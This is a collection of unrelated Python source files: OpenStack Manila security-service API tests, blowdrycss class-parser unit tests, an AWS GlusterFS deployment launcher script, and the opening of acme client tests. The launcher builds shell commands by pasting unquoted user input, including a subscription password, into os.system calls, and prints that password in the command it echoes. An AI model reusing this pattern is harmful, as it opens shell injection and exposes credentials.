@tc.attr(base.TAG_POSITIVE, base.TAG_API)
@testtools.skipIf(
not CONF.share.multitenancy_enabled, "Only for multitenancy.")
def test_list_security_services_filter_by_share_network(self):
sn = self.shares_client.get_share_network(
self.shares_client.share_network_id)
fresh_sn = []
for i in range(2):
sn = self.create_share_network(
neutron_net_id=sn["neutron_net_id"],
neutron_subnet_id=sn["neutron_subnet_id"])
fresh_sn.append(sn)
self.shares_client.add_sec_service_to_share_network(
fresh_sn[0]["id"], self.ss_ldap["id"])
self.shares_client.add_sec_service_to_share_network(
fresh_sn[1]["id"], self.ss_kerberos["id"])
listed = self.shares_client.list_security_services(
params={'share_network_id': fresh_sn[0]['id']})
self.assertEqual(1, len(listed))
self.assertEqual(self.ss_ldap['id'], listed[0]['id'])
keys = ["name", "id", "status", "type", ]
[self.assertIn(key, s_s.keys()) for s_s in listed for key in keys]
@tc.attr(base.TAG_POSITIVE, base.TAG_API)
def test_list_security_services_detailed_filter_by_ss_attributes(self):
search_opts = {
'name': 'ss_ldap',
'type': 'ldap',
'user': 'fake_user',
'server': 'fake_server_1',
'dns_ip': '1.1.1.1',
'domain': 'fake_domain_1',
}
listed = self.shares_client.list_security_services(
detailed=True,
params=search_opts)
self.assertTrue(any(self.ss_ldap['id'] == ss['id'] for ss in listed))
for ss in listed:
self.assertTrue(all(ss[key] == value for key, value
in search_opts.items()))
class SecurityServicesTest(base.BaseSharesTest,
SecurityServiceListMixin):
def setUp(self):
super(SecurityServicesTest, self).setUp()
ss_ldap_data = {
'name': 'ss_ldap',
'dns_ip': '1.1.1.1',
'server': 'fake_server_1',
'domain': 'fake_domain_1',
'user': 'fake_user',
'password': 'pass',
}
ss_kerberos_data = {
'name': 'ss_kerberos',
'dns_ip': '2.2.2.2',
'server': 'fake_server_2',
'domain': 'fake_domain_2',
'user': 'test_user',
'password': 'word',
}
self.ss_ldap = self.create_security_service('ldap', **ss_ldap_data)
self.ss_kerberos = self.create_security_service(
'kerberos', **ss_kerberos_data)
@tc.attr(base.TAG_POSITIVE, base.TAG_API)
def test_create_delete_security_service(self):
data = self.generate_security_service_data()
self.service_names = ["ldap", "kerberos", "active_directory"]
for ss_name in self.service_names:
ss = self.create_security_service(ss_name, **data)
self.assertDictContainsSubset(data, ss)
self.assertEqual(ss_name, ss["type"])
self.shares_client.delete_security_service(ss["id"])
@tc.attr(base.TAG_POSITIVE, base.TAG_API)
def test_get_security_service(self):
data = self.generate_security_service_data()
ss = self.create_security_service(**data)
self.assertDictContainsSubset(data, ss)
get = self.shares_client.get_security_service(ss["id"])
self.assertDictContainsSubset(data, get)
@tc.attr(base.TAG_POSITIVE, base.TAG_API)
def test_update_security_service(self):
data = self.generate_security_service_data()
ss = self.create_security_service(**data)
self.assertDictContainsSubset(data, ss)
upd_data = self.generate_security_service_data()
updated = self.shares_client.update_security_service(
ss["id"], **upd_data)
get = self.shares_client.get_security_service(ss["id"])
self.assertDictContainsSubset(upd_data, updated)
self.assertDictContainsSubset(upd_data, get)
@tc.attr(base.TAG_POSITIVE, base.TAG_API_WITH_BACKEND)
@testtools.skipIf(
not CONF.share.multitenancy_enabled, "Only for multitenancy.")
def test_try_update_valid_keys_sh_server_exists(self):
ss_data = self.generate_security_service_data()
ss = self.create_security_service(**ss_data)
sn = self.shares_client.get_share_network(
self.shares_client.share_network_id)
fresh_sn = self.create_share_network(
neutron_net_id=sn["neutron_net_id"],
neutron_subnet_id=sn["neutron_subnet_id"])
self.shares_client.add_sec_service_to_share_network(
fresh_sn["id"], ss["id"])
# Security service with fake data is used, so if we use backend driver
# that fails on wrong data, we expect error here.
# We require any share that uses our share-network.
try:
self.create_share(
share_network_id=fresh_sn["id"], cleanup_in_class=False)
except Exception as e:
# we do wait for either 'error' or 'available' status because
# it is the only available statuses for proper deletion.
LOG.warning("Caught exception. It is expected in case backend "
"fails having security-service with improper data "
"that leads to share-server creation error. "
"%s" % six.text_type(e))
update_data = {
"name": "name",
"description": "new_description",
}
updated = self.shares_client.update_security_service(
ss["id"], **update_data)
self.assertDictContainsSubset(update_data, updated)
@tc.attr(base.TAG_POSITIVE, base.TAG_API)
def test_list_security_services_filter_by_invalid_opt(self):
listed = self.shares_client.list_security_services(
params={'fake_opt': 'some_value'})
self.assertTrue(any(self.ss_ldap['id'] == ss['id'] for ss in listed))
self.assertTrue(any(self.ss_kerberos['id'] == ss['id']
for ss in listed))
|
|
# python 2
from __future__ import absolute_import
# builtin
from unittest import TestCase, main
# custom
from blowdrycss.classpropertyparser import ClassPropertyParser
class TestClassPropertyParser(TestCase):
def test_class_set_to_lowercase(self):
original_class_set = {'ThE', 'the', 'THE', 't2HE'}
expected_class_set = {'the', 'the', 'the', 't2he'}
class_parser = ClassPropertyParser(class_set=original_class_set)
class_parser.class_set_to_lowercase()
self.assertEqual(class_parser.class_set, expected_class_set)
def test_underscores_valid_is_true(self):
valid_classes = {'6_3', 'padding-5_2rem', 'height-24_48p', '1_2-5_75-1_2-5_75', 'n5_25cm', }
class_parser = ClassPropertyParser(class_set=valid_classes)
for css_class in class_parser.class_set:
self.assertTrue(class_parser.underscores_valid(css_class=css_class), msg=css_class)
def test_underscores_valid_is_false(self):
invalid_classes = {
'_bold', 'lighter-1_', 'width-_2', 'margin-2_rem', 'height-m_px', 'bg-color__blue',
'-_2', '2_rem', 'm_px', '__', '_35', '42_', '-7_2', '5_4-', ' _ ', ' _3_2', '8_9_ ', '6_4 _ ',
}
class_parser = ClassPropertyParser(class_set=set())
for css_class in invalid_classes:
self.assertFalse(class_parser.underscores_valid(css_class=css_class), msg=css_class)
def test_clean_class_set(self):
valid_classes = {
'color-hfff', 'font-color-hsla-120-60p-70p-0_3', 'padding-5_2rem', 'height-24_48p',
'padding-7_3-8_5-9_7-10_2', 'hfff-hover-i', 'hfff-i-hover', 'color-hfff-hover-i',
}
# Covers all invalid cases: first char, allowed chars, last char, and underscores.
invalid_classes = {
'', ' ', '*b', 'bg-color__blue', 'height-m_px', 'lighter-1$', 'margin-2_rem',
'padding-@1px-2px-1px-2px', 'width-_2', 'bold-', 'green_', 'font-color-#000',
}
expected_removed = {
' (May not be None or "".)',
' (Only a-z allowed for first character of class.)',
'*b (Only a-z allowed for first character of class.)',
'bg-color__blue (Invalid underscore usage in class.)',
'height-m_px (Invalid underscore usage in class.)',
'lighter-1$ (Only a-z, 0-9, "_", and "-" are allowed in class name.)',
'margin-2_rem (Invalid underscore usage in class.)',
'padding-@1px-2px-1px-2px (Only a-z, 0-9, "_", and "-" are allowed in class name.)',
'width-_2 (Invalid underscore usage in class.)',
'bold- (Only a-z and 0-9 allowed for last character of class.)',
'green_ (Only a-z and 0-9 allowed for last character of class.)',
'font-color-#000 (Only a-z, 0-9, "_", and "-" are allowed in class name.)',
}
class_parser = ClassPropertyParser(class_set=set()) # Prevents the implicit call in __init__()
class_parser.class_set = valid_classes.union(invalid_classes) # Mix valid and invalid classes
class_parser.clean_class_set()
self.assertEqual(class_parser.class_set, valid_classes) # Only valid classes should remain.
self.assertTrue(class_parser.removed_class_set == expected_removed, msg=expected_removed)
def test_get_property_name_by_identical_name_valid(self):
valid_identical_set = {'font-weight-bold', 'font-weight-700'}
expected_property_name = 'font-weight'
class_parser = ClassPropertyParser(class_set=valid_identical_set)
class_list = list(class_parser.class_set)
for i, css_class in enumerate(class_list):
property_name = class_parser.get_property_name(css_class=css_class)
self.assertEqual(property_name, expected_property_name)
def test_get_property_name_by_identical_name_invalid(self):
invalid_identical_set = [
'font-weight', 'font-weight-', 'afont-weight-', '-font-weight', 'font%weight', 'fw-', '700'
]
expected_property_name = ''
expected_empty_set = set()
class_parser = ClassPropertyParser(class_set=set())
for css_class in invalid_identical_set:
property_name = class_parser.get_property_name(css_class=css_class)
self.assertEqual(property_name, expected_property_name)
self.assertEqual(class_parser.class_set, expected_empty_set, msg=class_parser.class_set)
def test_get_property_name_by_alias(self):
class_alias_set = {'bold', 'bolder', 'lighter', 'fweight-200', 'f-weight-100', 'fw-bold', 'font-w-900', }
expected_property_name = 'font-weight'
class_parser = ClassPropertyParser(class_set=set())
class_list = list(class_alias_set)
for css_class in class_list:
property_name = class_parser.get_property_name(css_class=css_class)
self.assertEqual(property_name, expected_property_name, msg=css_class)
def test_get_property_name_by_regex(self):
class_alias_set = {'h0e2', 'h2ad', 'h987fcb', 'h15af36', }
expected_property_name = 'color'
class_parser = ClassPropertyParser(class_set=set())
class_list = list(class_alias_set)
for css_class in class_list:
property_name = class_parser.get_property_name(css_class=css_class)
self.assertEqual(property_name, expected_property_name, msg=css_class)
def test_get_property_name_non_matching(self):
non_matching = ['not-a-property-', 'a-font-not-']
expected_property_name = ''
expected_empty_set = set()
class_parser = ClassPropertyParser(class_set=set())
for css_class in non_matching:
property_name = class_parser.get_property_name(css_class=css_class)
self.assertEqual(property_name, expected_property_name)
self.assertEqual(class_parser.class_set, expected_empty_set)
def test_is_valid_pseudo_format_True(self):
valid_inputs = (
'color-blue-hover', 'padding-10rem-i-active', 'bgc-h048-visited',
'color-red-after', 'padding-20rem-i-before', 'bgc-h096-selection',
'hfff-hover-i', 'hfff-i-hover', 'color-hfff-hover-i', 'color-hfff-i-hover',
)
pseudo_items = (
'hover', 'active', 'visited', 'after', 'before', 'selection',
'hover', 'hover', 'hover', 'hover',
)
class_parser = ClassPropertyParser(class_set=set())
for i, valid_input in enumerate(valid_inputs):
self.assertTrue(
class_parser.is_valid_pseudo_format(pseudo_items[i], valid_input),
msg=valid_input
)
def test_is_valid_pseudo_format_False(self):
invalid_inputs = (
'-hover-blue', 'pa-active-10rem-i', 'bgc-', 'margin-10-medium-up',
'-after-blue', 'pa-before-10rem-i', 'bgc-', 'width-10-small-up'
)
pseudo_items = ('hover', 'active', 'invalid', 'invalid', 'after', 'before', 'invalid', 'invalid')
class_parser = ClassPropertyParser(class_set=set())
for i, invalid_input in enumerate(invalid_inputs):
self.assertFalse(
class_parser.is_valid_pseudo_format(pseudo_items[i], css_class=invalid_input),
msg=invalid_input
)
def test_get_pseudo_class(self):
valid_inputs = ('color-blue-hover', 'padding-10rem-i-active', 'bgc-h048-visited')
expected_classes = ('hover', 'active', 'visited', )
class_parser = ClassPropertyParser(class_set=set())
for i, valid_input in enumerate(valid_inputs):
class_parser.set_pseudo_class(css_class=valid_input)
self.assertEqual(class_parser.pseudo_class, expected_classes[i])
def test_get_pseudo_class_ValueError(self):
class_parser = ClassPropertyParser(class_set=set())
self.assertRaises(ValueError, class_parser.set_pseudo_class, '')
def test_get_pseudo_element(self):
valid_inputs = ('color-blue-after', 'padding-10rem-i-before', 'bgc-h048-selection', 'color-hfff-before')
expected_elements = ('after', 'before', 'selection', 'before')
class_parser = ClassPropertyParser(class_set=set())
for i, valid_input in enumerate(valid_inputs):
class_parser.set_pseudo_element(css_class=valid_input)
self.assertEqual(class_parser.pseudo_element, expected_elements[i])
def test_get_pseudo_element_ValueError(self):
class_parser = ClassPropertyParser(class_set=set())
self.assertRaises(ValueError, class_parser.set_pseudo_element, '')
def test_strip_property_name_matching(self):
property_name = 'font-weight'
encoded_property_value = 'font-weight-400'
expected_encoded_property_value = '400'
class_parser = ClassPropertyParser(class_set=set())
encoded_property_value = class_parser.strip_property_name(
property_name=property_name,
css_class=encoded_property_value
)
self.assertEqual(encoded_property_value, expected_encoded_property_value)
def test_strip_property_name_not_matching(self):
property_name = 'font-weight'
encoded_property_value = 'bold'
css_class = 'bold'
class_parser = ClassPropertyParser(class_set=set())
encoded_property_value = class_parser.strip_property_name(
property_name=property_name,
css_class=encoded_property_value
)
self.assertEqual(encoded_property_value, css_class)
def test_strip_property_name_empty(self):
empty_property_name = ''
css_class = 'bold'
class_parser = ClassPropertyParser(class_set=set())
self.assertRaises(ValueError, class_parser.strip_property_name, empty_property_name, css_class)
def test_strip_pseudo_item(self):
pseudo_items = ('hover', 'before', 'selection', )
css_classes = ('padding-10-i-hover', 'color-hfff-before', 'width-1rem-s-selection', )
expected = ('padding-10-i', 'color-hfff', 'width-1rem-s', )
class_parser = ClassPropertyParser(class_set=set())
for i, pseudo_item in enumerate(pseudo_items):
actual = class_parser.strip_pseudo_item(css_class=css_classes[i])
self.assertEqual(expected[i], actual)
def test_strip_pseudo_item_not_matching(self):
css_class = 'padding-10-i'
class_parser = ClassPropertyParser(class_set=set())
result = class_parser.strip_pseudo_item(css_class=css_class)
self.assertEqual(result, css_class) # css_class should remain unchanged.
def test_strip_pseudo_item_empty(self):
empty_class = ''
class_parser = ClassPropertyParser(class_set=set())
self.assertRaises(ValueError, class_parser.strip_pseudo_item, empty_class)
def test_strip_encoded_property_name_valueerror(self):
invalid_inputs = ['', ' ']
class_parser = ClassPropertyParser(class_set=set())
for invalid in invalid_inputs:
self.assertRaises(ValueError, class_parser.strip_property_name, invalid, 'c-lime')
self.assertRaises(ValueError, class_parser.strip_property_name, 'color', invalid)
def test_alias_is_abbreviation(self):
expected_true = ['fw-', 'p-', 'h-', 'w-']
expected_false = ['fw', 'p', 'height', 'width']
class_parser = ClassPropertyParser(class_set=set())
for _true in expected_true:
self.assertTrue(class_parser.alias_is_abbreviation(_true), msg=_true)
for _false in expected_false:
self.assertFalse(class_parser.alias_is_abbreviation(_false), msg=_false)
def test_get_property_abbreviations(self):
expected_abbreviations = ['fweight-', 'f-weight-', 'fw-', 'font-w-']
property_name = 'font-weight'
class_parser = ClassPropertyParser(class_set=set())
abbreviations = class_parser.get_property_abbreviations(property_name=property_name)
self.assertEqual(set(abbreviations), set(expected_abbreviations))
def test_get_property_abbreviations_raises_key_error(self):
invalid_property_name = 'invalid'
class_parser = ClassPropertyParser(class_set=set())
self.assertRaises(KeyError, class_parser.get_property_abbreviations, invalid_property_name)
def test_strip_property_abbreviation_matching(self):
property_name = 'font-weight'
css_class = 'fw-400'
expected_encoded_property_value = '400'
class_parser = ClassPropertyParser(class_set=set())
css_class = class_parser.strip_property_abbreviation(
property_name=property_name,
css_class=css_class
)
self.assertEqual(css_class, expected_encoded_property_value)
def test_strip_property_abbreviation_not_matching(self):
property_name = 'font-weight'
css_class = 'bold'
expected_encoded_property_value = 'bold'
class_parser = ClassPropertyParser(class_set=set())
css_class = class_parser.strip_property_abbreviation(
property_name=property_name,
css_class=css_class
)
self.assertEqual(css_class, expected_encoded_property_value)
def test_strip_property_abbreviation_raises_value_error(self):
invalid_inputs = ['', ' ']
class_parser = ClassPropertyParser(class_set=set())
for invalid in invalid_inputs:
self.assertRaises(ValueError, class_parser.strip_property_abbreviation, invalid, 'c-lime')
self.assertRaises(ValueError, class_parser.strip_property_abbreviation, 'color', invalid)
def test_get_encoded_property_value(self):
# 'fw-bold-i' --> 'bold' [abbreviated font-weight property_name]
# 'padding-1-10-10-5-i' --> '1-10-10-5' [standard property_name]
# 'height-7_25rem-i' --> '7_25rem' [contains underscores]
property_names = [
'font-weight', 'padding', 'height', 'width', 'background-color',
'color', 'color', 'color', 'color',
]
css_classes = [
'fw-bold-i', 'padding-1-10-10-5-i', 'height-7_25rem-i', 'width-50cm-s-i', 'bgc-red-i-hover',
'hfff-hover-i', 'hfff-i-hover', 'color-hfff-hover-i', 'color-hfff-i-hover',
]
expected_encoded_property_values = [
'bold', '1-10-10-5', '7_25rem', '50cm-s', 'red',
'hfff', 'hfff', 'hfff', 'hfff',
]
class_parser = ClassPropertyParser(class_set=set())
for i, css_class in enumerate(css_classes):
encoded_property_value = class_parser.get_encoded_property_value(
property_name=property_names[i],
css_class=css_class
)
self.assertEqual(encoded_property_value, expected_encoded_property_values[i], msg=encoded_property_value)
def test_get_encoded_property_value_invalid_raise_value_error(self):
invalid_inputs = ['', ' ']
class_parser = ClassPropertyParser(class_set=set())
for invalid in invalid_inputs:
self.assertRaises(ValueError, class_parser.get_encoded_property_value, invalid, 'c-lime')
self.assertRaises(ValueError, class_parser.get_encoded_property_value, 'color', invalid)
def test_get_property_value_valid_patterns(self):
property_name = 'color'
encoded_property_values = (
'green', 'h0ff48f', 'hfff', 'rgba-255-0-0-0_5', 'hsla-120-60p-70p-0_3', 'blue', 'hf8f8f8',
)
expected_property_values = (
'green', '#0ff48f', '#fff', 'rgba(255, 0, 0, 0.5)', 'hsla(120, 60%, 70%, 0.3)', 'blue', '#f8f8f8',
)
for i, value in enumerate(encoded_property_values):
css_class = property_name + '-' + value
class_parser = ClassPropertyParser(class_set={css_class})
property_value = class_parser.get_property_value(property_name=property_name, encoded_property_value=value)
self.assertEqual(property_value, expected_property_values[i])
self.assertEqual(class_parser.class_set, {css_class})
# Invalid CSS patterns that can be returned by this method.
def test_get_property_value_invalid_patterns(self):
property_name = 'color'
encoded_property_values = ['bold-50', '5u5', 'b1-a5-c1p-e5', '5pxrem', '1ap-10xp-3qp-1mp3', 'p12px']
expected_values = ['bold 50', '5u5', 'b1 a5 c1% e5', '5pxrem', '1a% 10x% 3q% 1mp3', 'p12px']
for i, value in enumerate(encoded_property_values):
css_class = property_name + '-' + value
class_parser = ClassPropertyParser(class_set={css_class})
property_value = class_parser.get_property_value(property_name=property_name, encoded_property_value=value)
self.assertEqual(property_value, expected_values[i])
def test_get_property_value_invalid_raise_value_error(self):
invalid_inputs = ['', ' ']
class_parser = ClassPropertyParser(class_set=set())
for invalid in invalid_inputs:
self.assertRaises(ValueError, class_parser.get_property_value, invalid, 'c-lime')
self.assertRaises(ValueError, class_parser.get_property_value, 'color', invalid)
def test_is_important_True(self):
expected_true = ('p-10-i', 'c-green-i-hover', 'hfff-hover-i', 'hfff-i-hover', 'color-hfff-hover-i',)
class_parser = ClassPropertyParser(class_set=set())
for valid in expected_true:
self.assertTrue(class_parser.is_important(css_class=valid), msg=valid)
def test_is_important_False(self):
expected_false = 'height-50'
class_parser = ClassPropertyParser(class_set=set())
self.assertFalse(class_parser.is_important(css_class=expected_false))
def test_is_important_raise_value_error(self):
invalid_inputs = ['', ' ']
class_parser = ClassPropertyParser(class_set=set())
for invalid in invalid_inputs:
self.assertRaises(ValueError, class_parser.is_important, invalid)
def test_strip_priority_designator(self):
important = 'p-10-i'
not_important = 'p-10'
expected_value = 'p-10'
class_parser = ClassPropertyParser(class_set=set())
value = class_parser.strip_priority_designator(css_class=important) # important
self.assertEqual(value, expected_value)
value = class_parser.strip_priority_designator(css_class=not_important) # not important
self.assertEqual(value, expected_value)
def test_strip_priority_designator_raise_value_error(self):
invalid_inputs = ['', ' ']
class_parser = ClassPropertyParser(class_set=set())
for invalid in invalid_inputs:
self.assertRaises(ValueError, class_parser.strip_priority_designator, invalid)
def test_get_property_priority_important(self):
expected_property_priority = 'important'
class_set = {
'font-weight-bold-i', 'font-weight-700-i', 'bold-i', 'normal-i-hover', 'padding-10-i-after',
'hfff-hover-i', 'hfff-i-hover', 'color-hfff-hover-i',
}
class_parser = ClassPropertyParser(class_set=class_set)
for css_class in class_parser.class_set:
property_priority = class_parser.get_property_priority(css_class=css_class)
self.assertEqual(property_priority, expected_property_priority)
def test_get_property_priority_not_important(self):
expected_property_priority = ''
class_set = {'font-weight-bold', 'font-weight-700', 'bold', 'normal-hover', 'padding-10-after', }
class_parser = ClassPropertyParser(class_set=class_set)
for css_class in class_parser.class_set:
property_priority = class_parser.get_property_priority(css_class=css_class)
self.assertEqual(property_priority, expected_property_priority)
def test_get_property_priority_raise_value_error(self):
invalid_inputs = ['', ' ']
class_parser = ClassPropertyParser(class_set=set())
for invalid in invalid_inputs:
self.assertRaises(ValueError, class_parser.get_property_priority, invalid)
if __name__ == '__main__':
main()
|
|
#!/usr/bin/env python
# vim: sw=2 ts=2
import click
import os
import sys
@click.command()
### AWS/EC2 options
@click.option('--glusterfs-stack-name', help='Specify a gluster stack name. Making the name unique will allow for multiple deployments',
show_default=True)
@click.option('--region', default='us-east-1', help='ec2 region',
show_default=True)
@click.option('--ami', default='ami-fbc89880', help='ec2 ami',
show_default=True)
@click.option('--node-instance-type', default='m4.2xlarge', help='ec2 instance type',
show_default=True)
@click.option('--use-cloudformation-facts', is_flag=True, help='Use cloudformation to populate facts. Requires Deployment >= OCP 3.5',
show_default=True)
@click.option('--keypair', help='ec2 keypair name',
show_default=True)
@click.option('--private-subnet-id1', help='Specify a Private subnet within the existing VPC',
show_default=True)
@click.option('--private-subnet-id2', help='Specify a Private subnet within the existing VPC',
show_default=True)
@click.option('--private-subnet-id3', help='Specify a Private subnet within the existing VPC',
show_default=True)
@click.option('--glusterfs-volume-size', default='500', help='Gluster volume size in GB',
show_default=True)
@click.option('--glusterfs-volume-type', default='st1', help='Gluster volume type',
show_default=True)
@click.option('--bastion-sg', help='Specify the Bastion Security Group',
show_default=True)
@click.option('--node-sg', help='Specify the Node Security Group',
show_default=True)
@click.option('--vpc', help='Specify the existing VPC',
show_default=True)
@click.option('--iops', help='Specify a numeric value for IOPS',
show_default=True)
### DNS options
@click.option('--public-hosted-zone', help='hosted zone for accessing the environment')
### Subscription and Software options
@click.option('--rhsm-user', help='Red Hat Subscription Management User')
@click.option('--rhsm-password', help='Red Hat Subscription Management Password',
hide_input=True,)
@click.option('--rhsm-pool', help='Red Hat Subscription Management Pool ID or Subscription Name for OpenShift')
### Miscellaneous options
@click.option('--existing-stack', help='Specify the name of the existing CloudFormation stack')
@click.option('--no-confirm', is_flag=True,
help='Skip confirmation prompt')
@click.help_option('--help', '-h')
@click.option('-v', '--verbose', count=True)
def launch_refarch_env(region=None,
ami=None,
no_confirm=False,
node_instance_type=None,
glusterfs_stack_name=None,
keypair=None,
public_hosted_zone=None,
rhsm_user=None,
rhsm_password=None,
rhsm_pool=None,
node_type=None,
private_subnet_id1=None,
private_subnet_id2=None,
private_subnet_id3=None,
glusterfs_volume_type=None,
glusterfs_volume_size=None,
iops=None,
bastion_sg=None,
node_sg=None,
vpc=None,
existing_stack=None,
use_cloudformation_facts=False,
verbose=0):
# Need to prompt for the R53 zone:
if public_hosted_zone is None:
public_hosted_zone = click.prompt('Hosted DNS zone for accessing the environment')
if existing_stack is None:
existing_stack = click.prompt('Specify the name of the existing CloudFormation stack')
if glusterfs_stack_name is None:
glusterfs_stack_name = click.prompt('Specify a unique name for the CRS CloudFormation stack')
# If no keypair is specified fail:
if keypair is None:
keypair = click.prompt('A SSH keypair must be specified or created')
if use_cloudformation_facts and bastion_sg is None:
bastion_sg = "Computed by Cloudformations"
elif bastion_sg is None:
bastion_sg = click.prompt("Specify the Security Group of the Bastion?")
if use_cloudformation_facts and node_sg is None:
node_sg = "Computed by Cloudformations"
elif node_sg is None:
node_sg = click.prompt("Specify the Security Group of the Node?")
if use_cloudformation_facts and vpc is None:
vpc = "Computed by Cloudformations"
elif vpc is None:
vpc = click.prompt("Specify the existing VPC?")
if use_cloudformation_facts and private_subnet_id1 is None:
private_subnet_id1 = "Computed by Cloudformations"
elif private_subnet_id1 is None:
private_subnet_id1 = click.prompt("Specify the first private subnet for the nodes?")
if use_cloudformation_facts and private_subnet_id2 is None:
private_subnet_id2 = "Computed by Cloudformations"
elif private_subnet_id2 is None:
private_subnet_id2 = click.prompt("Specify the second private subnet for the nodes?")
if use_cloudformation_facts and private_subnet_id3 is None:
private_subnet_id3 = "Computed by Cloudformations"
elif private_subnet_id3 is None:
private_subnet_id3 = click.prompt("Specify the third private subnet for the nodes?")
# If the user already provided values, don't bother asking again
if rhsm_user is None:
rhsm_user = click.prompt("RHSM username?")
if rhsm_password is None:
rhsm_pass = click.prompt("RHSM password?", hide_input=True)
if rhsm_pool is None:
rhsm_pool = click.prompt("RHSM Pool ID or Subscription Name for OpenShift?")
if glusterfs_volume_type in ['io1']:
iops = click.prompt('Specify a numeric value for iops')
if iops is None:
iops = "NA"
# Hidden facts for infrastructure.yaml
create_key = "no"
create_vpc = "no"
add_node = "no"
deploy_crs = "yes"
deploy_glusterfs = "false"
# Display information to the user about their choices
if use_cloudformation_facts:
click.echo('Configured values:')
click.echo('\tami: %s' % ami)
click.echo('\tregion: %s' % region)
click.echo('\tglusterfs_stack_name: %s' % glusterfs_stack_name)
click.echo('\tglusterfs_volume_type: %s' % glusterfs_volume_type)
click.echo('\tglusterfs_volume_size: %s' % glusterfs_volume_size)
click.echo('\tiops: %s' % iops)
click.echo('\tnode_instance_type: %s' % node_instance_type)
click.echo('\tkeypair: %s' % keypair)
click.echo('\tpublic_hosted_zone: %s' % public_hosted_zone)
click.echo('\trhsm_user: %s' % rhsm_user)
click.echo('\trhsm_password: *******')
click.echo('\trhsm_pool: %s' % rhsm_pool)
click.echo('\texisting_stack: %s' % existing_stack)
click.echo('\tSubnets and Security Groups will be gather from the CloudFormation')
click.echo("")
else:
click.echo('Configured values:')
click.echo('\tami: %s' % ami)
click.echo('\tregion: %s' % region)
click.echo('\tglusterfs_stack_name: %s' % glusterfs_stack_name)
click.echo('\tprivate_subnet_id1: %s' % private_subnet_id1)
click.echo('\tprivate_subnet_id2: %s' % private_subnet_id2)
click.echo('\tprivate_subnet_id3: %s' % private_subnet_id3)
click.echo('\tglusterfs_volume_type: %s' % glusterfs_volume_type)
click.echo('\tglusterfs_volume_size: %s' % glusterfs_volume_size)
click.echo('\tiops: %s' % iops)
click.echo('\tnode_instance_type: %s' % node_instance_type)
click.echo('\tbastion_sg: %s' % bastion_sg)
click.echo('\tnode_sg: %s' % node_sg)
click.echo('\tvpc: %s' % vpc)
click.echo('\tkeypair: %s' % keypair)
click.echo('\tpublic_hosted_zone: %s' % public_hosted_zone)
click.echo('\trhsm_user: %s' % rhsm_user)
click.echo('\trhsm_password: *******')
click.echo('\trhsm_pool: %s' % rhsm_pool)
click.echo('\texisting_stack: %s' % existing_stack)
click.echo("")
if not no_confirm:
click.confirm('Continue using these values?', abort=True)
playbooks = ['playbooks/infrastructure.yaml', 'playbooks/add-crs.yaml']
for playbook in playbooks:
# hide cache output unless in verbose mode
devnull='> /dev/null'
if verbose > 0:
devnull=''
# refresh the inventory cache to prevent stale hosts from
# interferring with re-running
command='inventory/aws/hosts/ec2.py --refresh-cache %s' % (devnull)
os.system(command)
# remove any cached facts to prevent stale data during a re-run
command='rm -rf .ansible/cached_facts'
os.system(command)
if use_cloudformation_facts:
command='ansible-playbook -i inventory/aws/hosts -e \'region=%s \
ami=%s \
keypair=%s \
glusterfs_stack_name=%s \
add_node=no \
deploy_crs=yes \
node_instance_type=%s \
public_hosted_zone=%s \
rhsm_user=%s \
rhsm_password=%s \
rhsm_pool="%s" \
key_path=/dev/null \
create_key=%s \
create_vpc=%s \
glusterfs_volume_type=%s \
glusterfs_volume_size=%s \
deploy_glusterfs=%s \
iops=%s \
stack_name=%s \' %s' % (region,
ami,
keypair,
glusterfs_stack_name,
node_instance_type,
public_hosted_zone,
rhsm_user,
rhsm_password,
rhsm_pool,
create_key,
create_vpc,
glusterfs_volume_type,
glusterfs_volume_size,
deploy_glusterfs,
iops,
existing_stack,
playbook)
else:
command='ansible-playbook -i inventory/aws/hosts -e \'region=%s \
ami=%s \
keypair=%s \
glusterfs_stack_name=%s \
add_node=no \
deploy_crs=yes \
node_instance_type=%s \
private_subnet_id1=%s \
private_subnet_id2=%s \
private_subnet_id3=%s \
public_hosted_zone=%s \
rhsm_user=%s \
rhsm_password=%s \
rhsm_pool="%s" \
key_path=/dev/null \
create_key=%s \
create_vpc=%s \
glusterfs_volume_type=%s \
glusterfs_volume_size=%s \
deploy_glusterfs=%s \
iops=%s \
bastion_sg=%s \
node_sg=%s \
vpc=%s \
stack_name=%s \' %s' % (region,
ami,
keypair,
glusterfs_stack_name,
node_instance_type,
private_subnet_id1,
private_subnet_id2,
private_subnet_id3,
public_hosted_zone,
rhsm_user,
rhsm_password,
rhsm_pool,
create_key,
create_vpc,
glusterfs_volume_type,
glusterfs_volume_size,
deploy_glusterfs,
iops,
bastion_sg,
node_sg,
vpc,
existing_stack,
playbook)
if verbose > 0:
command += " -" + "".join(['v']*verbose)
click.echo('We are running: %s' % command)
status = os.system(command)
if os.WIFEXITED(status) and os.WEXITSTATUS(status) != 0:
return os.WEXITSTATUS(status)
if __name__ == '__main__':
# check for AWS access info
if os.getenv('AWS_ACCESS_KEY_ID') is None or os.getenv('AWS_SECRET_ACCESS_KEY') is None:
print 'AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY **MUST** be exported as environment variables.'
sys.exit(1)
launch_refarch_env(auto_envvar_prefix='OSE_REFArch')
|
|
"""Tests for acme.client."""
import datetime
import json
import unittest
from six.moves import http_client # pylint: disable=import-error
import mock
import requests
from acme import challenges
from acme import errors
from acme import jose
from acme import jws as acme_jws
from acme import messages
from acme import messages_test
from acme import test_util
CERT_DER = test_util.load_vector('cert.der')
KEY = jose.JWKRSA.load(test_util.load_vector('rsa512_key.pem'))
KEY2 = jose.JWKRSA.load(test_util.load_vector('rsa256_key.pem'))
class ClientTest(unittest.TestCase):
"""Tests for acme.client.Client."""
# pylint: disable=too-many-instance-attributes,too-many-public-methods
def setUp(self):
self.response = mock.MagicMock(
ok=True, status_code=http_client.OK, headers={}, links={})
self.net = mock.MagicMock()
self.net.post.return_value = self.response
self.net.get.return_value = self.response
self.directory = messages.Directory({
messages.NewRegistration:
'https://www.letsencrypt-demo.org/acme/new-reg',
messages.Revocation:
'https://www.letsencrypt-demo.org/acme/revoke-cert',
})
from acme.client import Client
self.client = Client(
directory=self.directory, key=KEY, alg=jose.RS256, net=self.net)
self.identifier = messages.Identifier(
typ=messages.IDENTIFIER_FQDN, value='example.com')
# Registration
self.contact = ('mailto:cert-admin@example.com', 'tel:+12025551212')
reg = messages.Registration(
contact=self.contact, key=KEY.public_key())
self.new_reg = messages.NewRegistration(**dict(reg))
self.regr = messages.RegistrationResource(
body=reg, uri='https://www.letsencrypt-demo.org/acme/reg/1',
new_authzr_uri='https://www.letsencrypt-demo.org/acme/new-reg',
terms_of_service='https://www.letsencrypt-demo.org/tos')
# Authorization
